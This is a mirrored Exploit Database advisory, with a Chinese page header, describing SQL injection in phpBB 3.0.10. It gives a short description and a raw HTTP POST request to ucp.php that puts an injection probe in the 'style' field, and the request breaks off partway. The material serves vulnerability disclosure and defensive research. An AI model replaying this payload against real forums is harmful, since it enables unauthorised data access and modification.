phpBB – Multiple SQL Injections

• Exploit Database
• 16 阅读

• 作者： HauntIT
  日期： 2012-07-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37551/

• source: https://www.securityfocus.com/bid/54734/info
  
  phpBB is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
  
  A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
  
  phpBB 3.0.10 is vulnerable; other versions may also be affected. 
  
  Request :
  
  ---
  POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-us,en;q=0.5
  Accept-Encoding: gzip, deflate
  Proxy-Connection: keep-alive
  Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
  Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 258
  Connection: close
  
  viewemail=1
  &massemail=1
  &allowpm=1
  &hideonline=0
  &notifypm=1
  &popuppm=0
  &lang=en
  &style=%2b1111111111
  &tz=0
  &dst=0
  &dateoptions=D+M+d%2C+Y+g%3Ai+a
  &dateformat=D+M+d%2C+Y+g%3Ai+a
  &submit=Submit
  &creation_time=1343370877
  &form_token=576...